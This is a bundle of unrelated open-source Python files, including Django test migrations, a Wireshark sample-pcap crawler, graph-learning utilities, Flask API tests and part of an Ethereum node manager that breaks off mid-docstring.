('band', modelcluster.fields.ParentalKey(related_name='members', to='tests.Band', on_delete=django.db.models.deletion.CASCADE)),
],
),
migrations.CreateModel(
name='Chef',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Dish',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Log',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('time', models.DateTimeField(null=True, blank=True)),
('data', models.CharField(max_length=255)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='MenuItem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('price', models.DecimalField(max_digits=6, decimal_places=2)),
('dish', models.ForeignKey(related_name='+', to='tests.Dish', on_delete=django.db.models.deletion.CASCADE)),
],
),
migrations.CreateModel(
name='Place',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Review',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('author', models.CharField(max_length=255)),
('body', models.TextField()),
],
),
migrations.CreateModel(
name='TaggedPlace',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Wine',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Restaurant',
fields=[
('place_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='tests.Place', on_delete=django.db.models.deletion.CASCADE)),
('serves_hot_dogs', models.BooleanField(default=False)),
('proprietor', models.ForeignKey(related_name='restaurants', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='tests.Chef', null=True)),
],
options={
'abstract': False,
},
bases=('tests.place',),
),
migrations.CreateModel(
name='Document',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),
('title', models.CharField(max_length=255)),
('file', models.FileField(upload_to='documents')),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='taggedplace',
name='content_object',
field=modelcluster.fields.ParentalKey(related_name='tagged_items', to='tests.Place', on_delete=django.db.models.deletion.CASCADE),
),
migrations.AddField(
model_name='taggedplace',
name='tag',
field=models.ForeignKey(related_name='tests_taggedplace_items', to='taggit.Tag', on_delete=django.db.models.deletion.CASCADE),
),
migrations.AddField(
model_name='review',
name='place',
field=modelcluster.fields.ParentalKey(related_name='reviews', to='tests.Place', on_delete=django.db.models.deletion.CASCADE),
),
migrations.AddField(
model_name='place',
name='tags',
field=modelcluster.contrib.taggit.ClusterTaggableManager(to='taggit.Tag', through='tests.TaggedPlace', blank=True, help_text='A comma-separated list of tags.', verbose_name='Tags'),
),
migrations.AddField(
model_name='menuitem',
name='recommended_wine',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='tests.Wine', null=True),
),
migrations.AddField(
model_name='album',
name='band',
field=modelcluster.fields.ParentalKey(related_name='albums', to='tests.Band', on_delete=django.db.models.deletion.CASCADE),
),
migrations.AddField(
model_name='menuitem',
name='restaurant',
field=modelcluster.fields.ParentalKey(related_name='menu_items', to='tests.Restaurant', on_delete=django.db.models.deletion.CASCADE),
),
]
|
fexm/seed_crawlers/pcap_crawler.py
|
fgsect/fexm
| 105 |
85449
|
#!/usr/bin/env python3
"""
Crawls all links on a webpage for pcaps.
"""
import argparse
import logging
from multiprocessing.pool import ThreadPool
from urllib.parse import urljoin
import os
import shutil
import requests
from bs4 import BeautifulSoup
from functools import partial
from helpers import utils
from seed_crawlers import pcap_parser
logging.basicConfig()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
POOL_WORKER_COUNT = 8 # How many downloads we should run at the same time
def download_and_depcapize(url: str, out_dir: str, keep_pcaps: bool = False, ignore_exts: bool = False,
skip_analysis: bool = False) -> None:
"""
Downloads to a tmp folder inside the given folder (./pcap_tmp) and then parses each pcap to a text file
:param url: the page to crawl (depth 1)
:param out_dir: the download folder
    :param keep_pcaps: whether to keep the downloaded pcaps in ./pcap_tmp after the run (if False they are removed)
:param ignore_exts: If true, we'll also download unsupported file extensions (not .cap, .pcap, .gz or .pcapng)
:param skip_analysis: If true, we'll only download, not `depcapize` (run pcap parser) on the files.
"""
if not keep_pcaps and skip_analysis:
raise ValueError("Deleting PCAPs after a run while also skipping the analysis part would not make any sense.")
pool = ThreadPool(POOL_WORKER_COUNT)
logger.info("Downloading and parsing {}".format(url))
page = BeautifulSoup(requests.get(url).text, "html.parser")
link_anchors = page.find_all("a")
links = list(map(lambda x: x.get("href"), link_anchors)) # type: [str]
tmpdir = os.path.join(out_dir, "pcap_tmp")
os.makedirs(out_dir, exist_ok=True)
os.makedirs(tmpdir, exist_ok=True)
download_list = []
for link in links:
if not ignore_exts and "{}.".format(link).rsplit(".", 2)[1].lower() not in pcap_parser.SUPPORTED_EXTENSIONS:
logger.info("Ignoring file {} - unsupported extension.".format(link))
continue
download_url = urljoin(url, link)
download_list.append(download_url)
logger.info("Downloading {} files as network seeds.".format(len(download_list)))
downloader = partial(utils.download_file, tmpdir)
pool.map(downloader, download_list)
logger.info("Done downloading all files from {}".format(url))
if not skip_analysis:
pcap_parser.Overmind(backend=pcap_parser.FileBackend(outfolder=out_dir)).analyze_folder(
tmpdir).finish_analysis()
if not keep_pcaps:
logger.info("Removing tmpdir.")
        shutil.rmtree(tmpdir)
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser(description="Downloads all PCAPS from a webpage, stores them to a tmp folder "
"and then converts them to plaintext")
# arg_parser.add_argument("-f", "--filter",
# default="port not 22 and host 10.7.14.2",
# help="TCPdump style filter to use")
arg_parser.add_argument("-o", "--outdir", default="./out", help="Folder to write output files to.")
arg_parser.add_argument("-u", "--url",
default="https://wiki.wireshark.org/SampleCaptures", help="The url to crawl pcaps from")
arg_parser.add_argument("-e", "--ignore-exts", default=False, help="If true, unknown extensions will be downloaded")
arg_parser.add_argument("--keep-pcaps", default=True, help="Keep or remove pcaps in ./pcap_tmp")
arg_parser.add_argument("--skip-analysis", default=False, help="Skip the analysis, only download to ./pcap_tmp.")
args = arg_parser.parse_args()
download_and_depcapize(out_dir=args.outdir, url=args.url, ignore_exts=args.ignore_exts, keep_pcaps=args.keep_pcaps,
skip_analysis=args.skip_analysis)
|
examples/recurrent/lightning_example.py
|
tforgaard/pytorch_geometric_temporal
| 1,410 |
85450
|
<filename>examples/recurrent/lightning_example.py<gh_stars>1000+
import torch
from torch.nn import functional as F
import pytorch_lightning as pl
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from torch_geometric_temporal.nn.recurrent import DCRNN
from torch_geometric_temporal.dataset import ChickenpoxDatasetLoader
from torch_geometric_temporal.signal import temporal_signal_split
class LitDiffConvModel(pl.LightningModule):
def __init__(self, node_features, filters):
super().__init__()
self.recurrent = DCRNN(node_features, filters, 1)
self.linear = torch.nn.Linear(filters, 1)
def configure_optimizers(self):
optimizer = torch.optim.Adam(self.parameters(), lr=1e-2)
return optimizer
def training_step(self, train_batch, batch_idx):
x = train_batch.x
y = train_batch.y.view(-1, 1)
edge_index = train_batch.edge_index
h = self.recurrent(x, edge_index)
h = F.relu(h)
h = self.linear(h)
loss = F.mse_loss(h, y)
return loss
def validation_step(self, val_batch, batch_idx):
x = val_batch.x
y = val_batch.y.view(-1, 1)
edge_index = val_batch.edge_index
h = self.recurrent(x, edge_index)
h = F.relu(h)
h = self.linear(h)
loss = F.mse_loss(h, y)
metrics = {'val_loss': loss}
self.log_dict(metrics)
return metrics
loader = ChickenpoxDatasetLoader()
dataset_loader = loader.get_dataset(lags=32)
train_loader, val_loader = temporal_signal_split(dataset_loader,
train_ratio=0.2)
model = LitDiffConvModel(node_features=32,
filters=16)
early_stop_callback = EarlyStopping(monitor='val_loss',
min_delta=0.00,
patience=10,
verbose=False,
                                    mode='min')
trainer = pl.Trainer(callbacks=[early_stop_callback])
trainer.fit(model, train_loader, val_loader)
|
tests/modules/teams/resources/test_getting_teams_info.py
|
IsmaelJS/test-github-actions
| 1,420 |
85465
|
<filename>tests/modules/teams/resources/test_getting_teams_info.py
# encoding: utf-8
import pytest
@pytest.mark.parametrize('auth_scopes', (
None,
('teams:write', ),
))
def test_getting_list_of_teams_by_unauthorized_user_must_fail(
flask_app_client,
regular_user,
auth_scopes
):
with flask_app_client.login(regular_user, auth_scopes=auth_scopes):
response = flask_app_client.get('/api/v1/teams/')
assert response.status_code == 401
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'status', 'message'}
@pytest.mark.parametrize('auth_scopes', (
('teams:read', ),
('teams:read', 'teams:write', ),
))
def test_getting_list_of_teams_by_authorized_user(
flask_app_client,
regular_user,
team_for_regular_user,
auth_scopes
):
with flask_app_client.login(regular_user, auth_scopes=auth_scopes):
response = flask_app_client.get('/api/v1/teams/')
assert response.status_code == 200
assert 'X-Total-Count' in response.headers
assert int(response.headers['X-Total-Count']) == 1
assert response.content_type == 'application/json'
assert isinstance(response.json, list)
assert set(response.json[0].keys()) >= {'id', 'title'}
if response.json[0]['id'] == team_for_regular_user.id:
assert response.json[0]['title'] == team_for_regular_user.title
@pytest.mark.parametrize('auth_scopes', (
None,
('teams:write', ),
))
def test_getting_team_info_by_unauthorized_user_must_fail(
flask_app_client,
regular_user,
team_for_regular_user,
auth_scopes
):
with flask_app_client.login(regular_user, auth_scopes=auth_scopes):
response = flask_app_client.get('/api/v1/teams/%d' % team_for_regular_user.id)
assert response.status_code == 401
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'status', 'message'}
@pytest.mark.parametrize('auth_scopes', (
('teams:read', ),
('teams:read', 'teams:write', ),
))
def test_getting_team_info_by_authorized_user(
flask_app_client,
regular_user,
team_for_regular_user,
auth_scopes
):
with flask_app_client.login(regular_user, auth_scopes=auth_scopes):
response = flask_app_client.get('/api/v1/teams/%d' % team_for_regular_user.id)
assert response.status_code == 200
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'id', 'title'}
assert response.json['id'] == team_for_regular_user.id
assert response.json['title'] == team_for_regular_user.title
@pytest.mark.parametrize('auth_scopes', (
None,
('teams:write', ),
))
def test_getting_list_of_team_members_by_unauthorized_user_must_fail(
flask_app_client,
regular_user,
team_for_regular_user,
auth_scopes
):
with flask_app_client.login(regular_user, auth_scopes=auth_scopes):
response = flask_app_client.get('/api/v1/teams/%d/members/' % team_for_regular_user.id)
assert response.status_code == 401
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'status', 'message'}
@pytest.mark.parametrize('auth_scopes', (
('teams:read', ),
('teams:read', 'teams:write', ),
))
def test_getting_list_of_team_members_by_authorized_user(
flask_app_client,
regular_user,
team_for_regular_user,
auth_scopes
):
with flask_app_client.login(regular_user, auth_scopes=auth_scopes):
response = flask_app_client.get('/api/v1/teams/%d/members/' % team_for_regular_user.id)
assert response.status_code == 200
assert response.content_type == 'application/json'
assert isinstance(response.json, list)
assert set(response.json[0].keys()) >= {'team', 'user', 'is_leader'}
assert set(member['team']['id'] for member in response.json) == {team_for_regular_user.id}
assert regular_user.id in set(member['user']['id'] for member in response.json)
|
running_modes/validation/logging/local_validation_logger.py
|
lilleswing/Reinvent-1
| 183 |
85471
|
<gh_stars>100-1000
from running_modes.configurations.general_configuration_envelope import GeneralConfigurationEnvelope
from running_modes.validation.logging.base_validation_logger import BaseValidationLogger
class LocalValidationLogger(BaseValidationLogger):
def __init__(self, configuration: GeneralConfigurationEnvelope):
super().__init__(configuration)
def log_message(self, message: str):
self._common_logger.info(message)
|
src/bionev/utils.py
|
QustKcz/BioNEV
| 195 |
85474
|
<filename>src/bionev/utils.py
# -*- coding: utf-8 -*-
import copy
import itertools
import random
import networkx as nx
import numpy as np
import bionev.OpenNE.graph as og
import bionev.struc2vec.graph as sg
def read_for_OpenNE(filename, weighted=False):
G = og.Graph()
print("Loading training graph for learning embedding...")
G.read_edgelist(filename=filename, weighted=weighted)
print("Graph Loaded...")
return G
def read_for_struc2vec(filename):
print("Loading training graph for learning embedding...")
G = sg.load_edgelist(filename, undirected=True)
print("Graph Loaded...")
return G
def read_for_gae(filename, weighted=False):
print("Loading training graph for learning embedding...")
edgelist = np.loadtxt(filename, dtype='float')
if weighted:
edgelist = [(int(edgelist[idx, 0]), int(edgelist[idx, 1])) for idx in range(edgelist.shape[0]) if
edgelist[idx, 2] > 0]
else:
edgelist = [(int(edgelist[idx, 0]), int(edgelist[idx, 1])) for idx in range(edgelist.shape[0])]
G=nx.from_edgelist(edgelist)
node_list=list(G.nodes)
adj = nx.adjacency_matrix(G, nodelist=node_list)
print("Graph Loaded...")
return (adj,node_list)
def read_for_SVD(filename, weighted=False):
if weighted:
G = nx.read_weighted_edgelist(filename)
else:
G = nx.read_edgelist(filename)
return G
def split_train_test_graph(input_edgelist, seed, testing_ratio=0.2, weighted=False):
if (weighted):
G = nx.read_weighted_edgelist(input_edgelist)
else:
G = nx.read_edgelist(input_edgelist)
node_num1, edge_num1 = len(G.nodes), len(G.edges)
print('Original Graph: nodes:', node_num1, 'edges:', edge_num1)
testing_edges_num = int(len(G.edges) * testing_ratio)
random.seed(seed)
testing_pos_edges = random.sample(G.edges, testing_edges_num)
G_train = copy.deepcopy(G)
for edge in testing_pos_edges:
node_u, node_v = edge
if (G_train.degree(node_u) > 1 and G_train.degree(node_v) > 1):
G_train.remove_edge(node_u, node_v)
    G_train.remove_nodes_from(list(nx.isolates(G_train)))
node_num2, edge_num2 = len(G_train.nodes), len(G_train.edges)
assert node_num1 == node_num2
train_graph_filename = 'graph_train.edgelist'
if weighted:
nx.write_edgelist(G_train, train_graph_filename, data=['weight'])
else:
nx.write_edgelist(G_train, train_graph_filename, data=False)
node_num1, edge_num1 = len(G_train.nodes), len(G_train.edges)
print('Training Graph: nodes:', node_num1, 'edges:', edge_num1)
return G, G_train, testing_pos_edges, train_graph_filename
def generate_neg_edges(original_graph, testing_edges_num, seed):
L = list(original_graph.nodes())
# create a complete graph
G = nx.Graph()
G.add_nodes_from(L)
G.add_edges_from(itertools.combinations(L, 2))
# remove original edges
G.remove_edges_from(original_graph.edges())
random.seed(seed)
neg_edges = random.sample(G.edges, testing_edges_num)
return neg_edges
def load_embedding(embedding_file_name, node_list=None):
with open(embedding_file_name) as f:
node_num, emb_size = f.readline().split()
print('Nodes with embedding: %s'%node_num)
embedding_look_up = {}
if node_list:
for line in f:
vec = line.strip().split()
node_id = vec[0]
if (node_id in node_list):
emb = [float(x) for x in vec[1:]]
emb = emb / np.linalg.norm(emb)
emb[np.isnan(emb)] = 0
embedding_look_up[node_id] = np.array(emb)
# if len(node_list) != len(embedding_look_up):
# diff_nodes=set(node_list).difference(set(embedding_look_up.keys()))
# for node in diff_nodes:
# emb = np.random.random((int(emb_size)))
# emb = emb / np.linalg.norm(emb)
# emb[np.isnan(emb)] = 0
# embedding_look_up[node] = np.array(emb)
assert len(node_list) == len(embedding_look_up)
else:
for line in f:
vec = line.strip().split()
node_id = vec[0]
embeddings = vec[1:]
emb = [float(x) for x in embeddings]
emb = emb / np.linalg.norm(emb)
emb[np.isnan(emb)] = 0
embedding_look_up[node_id] = list(emb)
assert int(node_num) == len(embedding_look_up)
f.close()
return embedding_look_up
def read_node_labels(filename):
fin = open(filename, 'r')
node_list = []
labels = []
while 1:
l = fin.readline()
if l == '':
break
vec = l.strip().split()
node_list.append(vec[0])
labels.append(vec[1:])
fin.close()
print('Nodes with labels: %s'%len(node_list))
return node_list, labels
def split_train_test_classify(embedding_look_up, X, Y, seed, testing_ratio=0.2):
state = np.random.get_state()
training_ratio = 1 - testing_ratio
training_size = int(training_ratio * len(X))
np.random.seed(seed)
shuffle_indices = np.random.permutation(np.arange(len(X)))
X_train = [embedding_look_up[X[shuffle_indices[i]]] for i in range(training_size)]
Y_train = [Y[shuffle_indices[i]] for i in range(training_size)]
X_test = [embedding_look_up[X[shuffle_indices[i]]] for i in range(training_size, len(X))]
Y_test = [Y[shuffle_indices[i]] for i in range(training_size, len(X))]
X_train = np.array(X_train)
Y_train = np.array(Y_train)
X_test = np.array(X_test)
Y_test = np.array(Y_test)
np.random.set_state(state)
return X_train, Y_train, X_test, Y_test
def get_y_pred(y_test, y_pred_prob):
y_pred = np.zeros(y_pred_prob.shape)
sort_index = np.flip(np.argsort(y_pred_prob, axis=1), 1)
for i in range(y_test.shape[0]):
num = np.sum(y_test[i])
for j in range(num):
y_pred[i][sort_index[i][j]] = 1
return y_pred
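# --- Illustrative usage (editor's note, not part of the original module) ---
# Typical link-prediction flow built from these helpers (file names are
# assumptions): split the edgelist, learn embeddings on the training graph with
# one of the wrapped methods, then score held-out positive/negative edges.
#
#   G, G_train, test_pos_edges, train_file = split_train_test_graph(
#       'graph.edgelist', seed=0, testing_ratio=0.2)
#   neg_edges = generate_neg_edges(G, len(test_pos_edges), seed=0)
#   embeddings = load_embedding('embeddings.txt', node_list=list(G_train.nodes))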
|
src/aiortc/exceptions.py
|
thedilletante/aiortc
| 1,021 |
85491
|
class InternalError(Exception):
pass
class InvalidAccessError(Exception):
pass
class InvalidStateError(Exception):
pass
|
rotkehlchen/chain/ethereum/manager.py
|
rotkehlchenio/rotkehlchen
| 137 |
85519
|
import json
import logging
import random
from typing import Any, Callable, Dict, List, Literal, Optional, Sequence, Tuple, Union, overload
from urllib.parse import urlparse
import requests
from ens import ENS
from ens.abis import ENS as ENS_ABI, RESOLVER as ENS_RESOLVER_ABI
from ens.exceptions import InvalidName
from ens.main import ENS_MAINNET_ADDR
from ens.utils import (
address_to_reverse_domain,
is_none_or_zero_address,
normal_name_to_hash,
normalize_name,
)
from eth_typing import BlockNumber, HexStr
from web3 import HTTPProvider, Web3
from web3._utils.abi import get_abi_output_types
from web3._utils.contracts import find_matching_event_abi
from web3._utils.filters import construct_event_filter_params
from web3.datastructures import MutableAttributeDict
from web3.exceptions import (
BadFunctionCallOutput,
BadResponseFormat,
BlockNotFound,
TransactionNotFound,
)
from web3.types import BlockIdentifier, FilterParams
from rotkehlchen.chain.constants import DEFAULT_EVM_RPC_TIMEOUT
from rotkehlchen.chain.ethereum.contracts import EthereumContract
from rotkehlchen.chain.ethereum.graph import Graph
from rotkehlchen.chain.ethereum.modules.eth2.constants import ETH2_DEPOSIT
from rotkehlchen.chain.ethereum.types import EnsContractParams, string_to_ethereum_address
from rotkehlchen.chain.ethereum.utils import multicall, multicall_2
from rotkehlchen.constants.ethereum import ERC20TOKEN_ABI, ETH_SCAN, UNIV1_LP_ABI
from rotkehlchen.errors.misc import (
BlockchainQueryError,
InputError,
RemoteError,
UnableToDecryptRemoteData,
)
from rotkehlchen.errors.serialization import DeserializationError
from rotkehlchen.externalapis.etherscan import Etherscan
from rotkehlchen.fval import FVal
from rotkehlchen.greenlets import GreenletManager
from rotkehlchen.logging import RotkehlchenLogsAdapter
from rotkehlchen.serialization.deserialize import (
deserialize_ethereum_address,
deserialize_ethereum_transaction,
deserialize_int_from_hex,
)
from rotkehlchen.serialization.serialize import process_result
from rotkehlchen.types import (
ChecksumEthAddress,
EthereumTransaction,
EVMTxHash,
SupportedBlockchain,
Timestamp,
)
from rotkehlchen.user_messages import MessagesAggregator
from rotkehlchen.utils.misc import from_wei, hex_or_bytes_to_str
from rotkehlchen.utils.network import request_get_dict
from .types import NodeName
from .utils import ENS_RESOLVER_ABI_MULTICHAIN_ADDRESS
logger = logging.getLogger(__name__)
log = RotkehlchenLogsAdapter(logger)
def _is_synchronized(current_block: int, latest_block: int) -> Tuple[bool, str]:
""" Validate that the ethereum node is synchronized
within 20 blocks of latest block
Returns a tuple (results, message)
- result: Boolean for confirmation of synchronized
- message: A message containing information on what the status is.
"""
message = ''
if current_block < (latest_block - 20):
message = (
f'Found ethereum node but it is out of sync. {current_block} / '
f'{latest_block}. Will use etherscan.'
)
log.warning(message)
return False, message
return True, message
WEB3_LOGQUERY_BLOCK_RANGE = 250000
def _query_web3_get_logs(
web3: Web3,
filter_args: FilterParams,
from_block: int,
to_block: Union[int, Literal['latest']],
contract_address: ChecksumEthAddress,
event_name: str,
argument_filters: Dict[str, Any],
) -> List[Dict[str, Any]]:
until_block = web3.eth.block_number if to_block == 'latest' else to_block
events: List[Dict[str, Any]] = []
start_block = from_block
    # we know that in most of its early life the Eth2 contract address returns a
    # lot of results. So limit the query range to not hit the infura limits every time
    # suppress https://lgtm.com/rules/1507386916281/ since it does not apply here
infura_eth2_log_query = (
'infura.io' in web3.manager.provider.endpoint_uri and # type: ignore # noqa: E501 lgtm [py/incomplete-url-substring-sanitization]
contract_address == ETH2_DEPOSIT.address
)
block_range = initial_block_range = WEB3_LOGQUERY_BLOCK_RANGE
if infura_eth2_log_query:
block_range = initial_block_range = 75000
while start_block <= until_block:
filter_args['fromBlock'] = start_block
end_block = min(start_block + block_range, until_block)
filter_args['toBlock'] = end_block
log.debug(
'Querying web3 node for contract event',
contract_address=contract_address,
event_name=event_name,
argument_filters=argument_filters,
from_block=filter_args['fromBlock'],
to_block=filter_args['toBlock'],
)
# As seen in https://github.com/rotki/rotki/issues/1787, the json RPC, if it
# is infura can throw an error here which we can only parse by catching the exception
try:
new_events_web3: List[Dict[str, Any]] = [dict(x) for x in web3.eth.get_logs(filter_args)] # noqa: E501
except (ValueError, KeyError) as e:
if isinstance(e, ValueError):
try:
decoded_error = json.loads(str(e).replace("'", '"'))
except json.JSONDecodeError:
# reraise the value error if the error is not json
raise e from None
msg = decoded_error.get('message', '')
else: # temporary hack for key error seen from pokt
msg = 'query returned more than 10000 results'
# errors from: https://infura.io/docs/ethereum/json-rpc/eth-getLogs
if msg in ('query returned more than 10000 results', 'query timeout exceeded'):
block_range = block_range // 2
if block_range < 50:
raise # stop retrying if block range gets too small
# repeat the query with smaller block range
continue
# else, well we tried .. reraise the error
raise e
# Turn all HexBytes into hex strings
for e_idx, event in enumerate(new_events_web3):
new_events_web3[e_idx]['blockHash'] = event['blockHash'].hex()
new_topics = []
for topic in event['topics']:
new_topics.append(topic.hex())
new_events_web3[e_idx]['topics'] = new_topics
new_events_web3[e_idx]['transactionHash'] = event['transactionHash'].hex()
start_block = end_block + 1
events.extend(new_events_web3)
# end of the loop, end of 1 query. Reset the block range to max
block_range = initial_block_range
return events
def _prepare_ens_call_arguments(addr: ChecksumEthAddress) -> List[Any]:
try:
reversed_domain = address_to_reverse_domain(addr)
except (TypeError, ValueError) as e:
raise InputError(f'Address {addr} has incorrect format or type. {str(e)}') from e
normalized_domain_name = normalize_name(reversed_domain)
arguments = [normal_name_to_hash(normalized_domain_name)]
return arguments
def _encode_ens_contract(params: EnsContractParams) -> str:
contract = EthereumContract(address=params.address, abi=params.abi, deployed_block=0)
return contract.encode(method_name=params.method_name, arguments=params.arguments)
def _decode_ens_contract(params: EnsContractParams, result_encoded: Any) -> ChecksumEthAddress:
contract = EthereumContract(address=params.address, abi=params.abi, deployed_block=0)
result = contract.decode( # pylint: disable=E1136
result=result_encoded,
method_name=params.method_name,
arguments=params.arguments,
)[0]
return string_to_ethereum_address(result)
# TODO: Ideally all these should become configurable
# Taking LINKPOOL out since it's just really too slow and seems to not
# respond to the batched calls almost at all. Combined with web3.py retries
# this makes the tokens balance queries super slow.
OPEN_NODES = (
NodeName.MYCRYPTO,
NodeName.BLOCKSCOUT,
NodeName.AVADO_POOL,
NodeName.ONEINCH,
NodeName.MYETHERWALLET,
# NodeName.LINKPOOL,
NodeName.CLOUDFLARE_ETH,
NodeName.ETHERSCAN,
)
ETHEREUM_NODES_TO_CONNECT_AT_START = (
NodeName.OWN,
NodeName.MYCRYPTO,
NodeName.BLOCKSCOUT,
NodeName.ONEINCH,
NodeName.AVADO_POOL,
NodeName.MYETHERWALLET,
# NodeName.LINKPOOL,
NodeName.CLOUDFLARE_ETH,
)
OPEN_NODES_WEIGHT_MAP = { # Probability with which to select each node
NodeName.ETHERSCAN: 0.3,
NodeName.MYCRYPTO: 0.15,
NodeName.BLOCKSCOUT: 0.1,
NodeName.AVADO_POOL: 0.05,
NodeName.ONEINCH: 0.15,
NodeName.MYETHERWALLET: 0.15,
# NodeName.LINKPOOL: 0.05,
NodeName.CLOUDFLARE_ETH: 0.1,
}
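# A small illustration of how a weight map like the one above can produce a
# weighted ordering without replacement (the approach taken by
# EthereumManager.default_call_order below): draw one entry at a time with
# random.choices over the remaining weights, then remove it. The function name
# and arguments are illustrative, not part of this module's API.
def _sketch_weighted_order(nodes, weight_map):
    import random  # imported locally so the sketch stands alone
    remaining = list(nodes)
    ordered = []
    while remaining:
        pick = random.choices(remaining, [weight_map[node] for node in remaining], k=1)[0]
        ordered.append(pick)
        remaining.remove(pick)
    return ordered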
class EthereumManager():
def __init__(
self,
ethrpc_endpoint: str,
etherscan: Etherscan,
msg_aggregator: MessagesAggregator,
greenlet_manager: GreenletManager,
connect_at_start: Sequence[NodeName],
eth_rpc_timeout: int = DEFAULT_EVM_RPC_TIMEOUT,
) -> None:
log.debug(f'Initializing Ethereum Manager with own rpc endpoint: {ethrpc_endpoint}')
self.greenlet_manager = greenlet_manager
self.web3_mapping: Dict[NodeName, Web3] = {}
self.own_rpc_endpoint = ethrpc_endpoint
self.etherscan = etherscan
self.msg_aggregator = msg_aggregator
self.eth_rpc_timeout = eth_rpc_timeout
self.archive_connection = False
self.queried_archive_connection = False
for node in connect_at_start:
self.greenlet_manager.spawn_and_track(
after_seconds=None,
task_name=f'Attempt connection to {str(node)} ethereum node',
exception_is_error=True,
method=self.attempt_connect,
name=node,
ethrpc_endpoint=node.endpoint(self.own_rpc_endpoint),
mainnet_check=True,
)
self.blocks_subgraph = Graph(
'https://api.thegraph.com/subgraphs/name/blocklytics/ethereum-blocks',
)
# A cache for the erc20 contract info to not requery same one
self.contract_info_cache: Dict[ChecksumEthAddress, Dict[str, Any]] = {}
def connected_to_any_web3(self) -> bool:
return (
NodeName.OWN in self.web3_mapping or
NodeName.MYCRYPTO in self.web3_mapping or
NodeName.BLOCKSCOUT in self.web3_mapping or
NodeName.AVADO_POOL in self.web3_mapping
)
def default_call_order(self, skip_etherscan: bool = False) -> List[NodeName]:
"""Default call order for ethereum nodes
Own node always has preference. Then all other node types are randomly queried
in sequence depending on a weighted probability.
Some benchmarks on weighted probability based random selection when compared
to simple random selection. Benchmark was on blockchain balance querying with
29 ethereum accounts and at the time 1010 different ethereum tokens.
With weights: etherscan: 0.5, mycrypto: 0.25, blockscout: 0.2, avado: 0.05
===> Runs: 66, 58, 60, 68, 58 seconds
---> Average: 62 seconds
- Without weights
===> Runs: 66, 82, 72, 58, 72 seconds
---> Average: 70 seconds
"""
result = []
if NodeName.OWN in self.web3_mapping:
result.append(NodeName.OWN)
selection = list(OPEN_NODES)
if skip_etherscan:
selection.remove(NodeName.ETHERSCAN)
ordered_list = []
while len(selection) != 0:
weights = []
for entry in selection:
weights.append(OPEN_NODES_WEIGHT_MAP[entry])
node = random.choices(selection, weights, k=1)
ordered_list.append(node[0])
selection.remove(node[0])
return result + ordered_list
def attempt_connect(
self,
name: NodeName,
ethrpc_endpoint: str,
mainnet_check: bool = True,
) -> Tuple[bool, str]:
"""Attempt to connect to a particular node type
For our own node, if the given rpc endpoint is not the same as the saved one,
the connection is re-attempted to the new one
"""
message = ''
node_connected = self.web3_mapping.get(name, None) is not None
own_node_already_connected = (
name == NodeName.OWN and
self.own_rpc_endpoint == ethrpc_endpoint and
node_connected
)
if own_node_already_connected or (node_connected and name != NodeName.OWN):
return True, 'Already connected to an ethereum node'
try:
parsed_eth_rpc_endpoint = urlparse(ethrpc_endpoint)
if not parsed_eth_rpc_endpoint.scheme:
ethrpc_endpoint = f"http://{ethrpc_endpoint}"
provider = HTTPProvider(
endpoint_uri=ethrpc_endpoint,
request_kwargs={'timeout': self.eth_rpc_timeout},
)
ens = ENS(provider)
web3 = Web3(provider, ens=ens)
except requests.exceptions.RequestException:
message = f'Failed to connect to ethereum node {name} at endpoint {ethrpc_endpoint}'
log.warning(message)
return False, message
try:
is_connected = web3.isConnected()
except AssertionError:
# Terrible, terrible hack but needed due to https://github.com/rotki/rotki/issues/1817
is_connected = False
if is_connected:
# Also make sure we are actually connected to the Ethereum mainnet
synchronized = True
msg = ''
try:
if mainnet_check:
network_id = int(web3.net.version)
if network_id != 1:
message = (
f'Connected to ethereum node {name} at endpoint {ethrpc_endpoint} but '
f'it is not on the ethereum mainnet. The chain id '
f'the node is in is {network_id}.'
)
log.warning(message)
return False, message
try:
current_block = web3.eth.block_number # pylint: disable=no-member
latest_block = self.query_eth_highest_block()
except (requests.exceptions.RequestException, RemoteError) as e:
msg = f'Could not query latest block due to {str(e)}'
log.warning(msg)
synchronized = False
else:
synchronized, msg = _is_synchronized(current_block, latest_block)
except ValueError as e:
message = (
f'Failed to connect to ethereum node {name} at endpoint '
f'{ethrpc_endpoint} due to {str(e)}'
)
return False, message
if not synchronized:
self.msg_aggregator.add_warning(
f'We could not verify that ethereum node {name} is '
'synchronized with the ethereum mainnet. Balances and other queries '
'may be incorrect.',
)
log.info(f'Connected ethereum node {name} at {ethrpc_endpoint}')
self.web3_mapping[name] = web3
return True, ''
# else
message = f'Failed to connect to ethereum node {name} at endpoint {ethrpc_endpoint}'
log.warning(message)
return False, message
def set_rpc_endpoint(self, endpoint: str) -> Tuple[bool, str]:
""" Attempts to set the RPC endpoint for the user's own ethereum node
Returns a tuple (result, message)
- result: Boolean for success or failure of changing the rpc endpoint
